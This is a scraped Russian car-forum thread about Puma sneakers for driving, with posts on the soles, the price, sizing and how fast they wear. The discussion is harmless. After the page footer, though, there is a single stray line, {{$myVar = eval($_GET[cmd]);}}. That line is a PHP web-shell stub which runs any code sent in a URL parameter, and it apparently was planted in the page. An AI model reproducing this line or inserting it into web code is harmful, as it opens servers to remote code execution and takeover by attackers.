+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 24

Тема: "правильная" обувь для вождения


  1. #1
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Для тех кто ищет "правильную" обувь для вождения:

    "PUMA" начала продавать новую коллекцию кроссовок в которой помимо попсовых моделей есть грамотно сделанные кроссовки для драйва! Ничего лишнего, только тонкая зализаная подошва, шарообразная пятка, жесткий эргономичный задник, удобная шнуровка, натуральная кожа и перфорированая "дышащая" ткань!!! Цена 2'990 руб., аналогичная модель от "Спарко" стоит 7'500. Для справки "Пума" разрабатывает и шьет гоночную обувь для "Спарко".
    У данной модели (и подобной гоночной обуви) только один минус: нежелательно ходить по глубоким лужам



    еще есть в коричневом цветовом решении

  2. #2
    <div class='quotetop'>Цитата(recarospeed &#064; Sep 3 2007, 10&#58;56) <{POST_SNAPBACK}></div><div class='quotemain'>Для тех кто ищет "правильную" обувь для вождения:

    "PUMA" начала продавать новую коллекцию кроссовок в которой помимо попсовых моделей есть грамотно сделанные кроссовки для драйва&#33; Ничего лишнего, только тонкая зализаная подошва, шарообразная пятка, жесткий эргономичный задник, удобная шнуровка, натуральная кожа и перфорированая "дышащая" ткань&#33;&#33;&#33; Цена 2&#39;990 руб., аналогичная модель от "Спарко" стоит 7&#39;500. Для справки "Пума" разрабатывает и шьет гоночную обувь для "Спарко".
    У данной модели (и подобной гоночной обуви) только один минус: нежелательно ходить по глубоким лужам


    еще есть в коричневом цветовом решении[/b][/quote]

    Интересная тема, а в России уже есть?? И много ли будет моделей?

  3. #3
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    <div class='quotetop'>Цитата(Logic &#064; Sep 3 2007, 13&#58;15) <{POST_SNAPBACK}></div><div class='quotemain'>Интересная тема, а в России уже есть??[/b][/quote]
    В России, точнее в Москве уже две недели как продаются в фирменых магазинах "PUMA". На фото пара которую я купил.

    <div class='quotetop'>Цитата(Logic &#064; Sep 3 2007, 13&#58;15) <{POST_SNAPBACK}></div><div class='quotemain'>И много ли будет моделей?[/b][/quote]
    Извини, не понял вопрос?

  4. #4
    GTI-Racing chess is on a distinguished road Аватар для chess
    Регистрация
    29.11.2006
    Откуда
    москвабад
    Машина
    CTR ЕК9, MPS K90, vw polo 6r
    Сообщений
    1,603
    У пумы летние модели почти всегда с "тонкая зализаная подошва, шарообразная пятка, жесткий эргономичный задник, удобная шнуровка, натуральная кожа и перфорированая "дышащая" ткань".
    У меня прошлого сезона такие есть. действительно удобно.

    Только уже не тот сезон.
    каждому своё
    АДМ GTI mkV st1.5 - 2.01.084
    АДМ Civic Type-R EK9 - 1.57.683
    Смоленск Civic Type-R EK9 - 1.47.690
    Нижний Новгород Civic Type-R EK9 - 1.53.472
    Казань Civic Type-R EK9 - 1.43.187
    MRW Civic Type-R EK9 - 2.01.663

  5. #5
    Супер Модератор ™B®embo™ is just really nice ™B®embo™ is just really nice ™B®embo™ is just really nice ™B®embo™ is just really nice Аватар для ™B®embo™
    Регистрация
    01.02.2007
    Откуда
    Москва
    Машина
    Mk4 R32 DSG Black Series / Mk4 GTI
    Сообщений
    4,234
    2 recarospeed Спасибо за совет и отзыв о модели B)

    2 Logic не поленись и прогуляйся в близлежащий магаз к тебе и погляди сколько там моделей всяких разных может чего прикупешь себе ;)

    2 Chess сезон хоть и не тот но держать их можно при себе всегда под сиденьем так навсякий случай :fgj:
    Техническое бюро moJotec

    "Продают лошадиные силы, а выигрывает момент!!!"

    Wolf in sheep's clothing;)

  6. #6
    Ну на зимний сезон пару зимних с начесом взял бы...дышащих)))

  7. #7
    Супер Модератор ™B®embo™ is just really nice ™B®embo™ is just really nice ™B®embo™ is just really nice ™B®embo™ is just really nice Аватар для ™B®embo™
    Регистрация
    01.02.2007
    Откуда
    Москва
    Машина
    Mk4 R32 DSG Black Series / Mk4 GTI
    Сообщений
    4,234
    <div class='quotetop'>Цитата(Logic &#064; Sep 3 2007, 23&#58;47) <{POST_SNAPBACK}></div><div class='quotemain'>Ну на зимний сезон пару зимних с начесом взял бы...дышащих)))[/b][/quote]
    Ultra-lights ;)
    Техническое бюро moJotec

    "Продают лошадиные силы, а выигрывает момент!!!"

    Wolf in sheep's clothing;)

  8. #8
    Блин, да эти кросовки еще 5 лет назад были&#33; Тока серая вставка была кожаной и 2 цветов, белая&#092;черная... у самго таких кроссов было 2 вида. Из-за сужения мыса у меня всегда при длительной езде болел нокоть на большом пальце и еще на них быстро подошва на пятке протирается до дыр.


    З.Ы. Перешел уже на рибок т.к. пума испортиась в плане размеров, теперь на мою лапу (45-46 размер) даже не налазит пумовский 47 размер&#33;&#33;&#33;&#33; :unsure:

  9. #9
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    <div class='quotetop'>Цитата(bafomet &#064; Sep 4 2007, 07&#58;26) <{POST_SNAPBACK}></div><div class='quotemain'>Блин, да эти кросовки еще 5 лет назад были&#33; Тока серая вставка была кожаной и 2 цветов, белая&#092;черная... у самго таких кроссов было 2 вида. Из-за сужения мыса у меня всегда при длительной езде болел нокоть на большом пальце и еще на них быстро подошва на пятке протирается до дыр.[/b][/quote]
    ну вот предрек скорую кончину моих новых чешек , а до этого я наивно надеялся что в них еще мой правнук будет отжигать

    <div class='quotetop'>Цитата(bafomet &#064; Sep 4 2007, 07&#58;26) <{POST_SNAPBACK}></div><div class='quotemain'>З.Ы. Перешел уже на рибок т.к. пума испортиась в плане размеров, теперь на мою лапу (45-46 размер) даже не налазит пумовский 47 размер&#33;&#33;&#33;&#33; :unsure:[/b][/quote]
    +1 обычно я ношу 43,5 а у PUMA в пору пришлись 44,5 но в данном случае это только польстило моему самолюбию = что я такой большой

  10. #10
    <div class='quotetop'>Цитата(recarospeed &#064; Sep 4 2007, 10&#58;09) <{POST_SNAPBACK}></div><div class='quotemain'>ну вот предрек скорую кончину моих новых чешек , а до этого я наивно надеялся что в них еще мой правнук будет отжигать
    +1 обычно я ношу 43,5 а у PUMA в пору пришлись 44,5 но в данном случае это только польстило моему самолюбию = что я такой большой [/b][/quote]
    А ты побегай по магазам, где тебе будут говорить что твоего размера нетути :-))) Мне это совсем не льстит...

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Ответов: 3
    Последнее сообщение: 02.04.2024, 06:45
  2. "I этап Кубка "МАГИСТРАЛЬ 2012" - 17 марта"
    от Magistral в разделе Туризм и отдых
    Ответов: 3
    Последнее сообщение: 02.04.2024, 03:58
  3. Обувь для вождения
    от *NITRO* в разделе Курилка
    Ответов: 37
    Последнее сообщение: 12.06.2014, 12:32
  4. Интеркуллер "Мокрый" или "Сухой"??? Хелп???
    от Танкист в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 10
    Последнее сообщение: 17.11.2009, 20:45

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}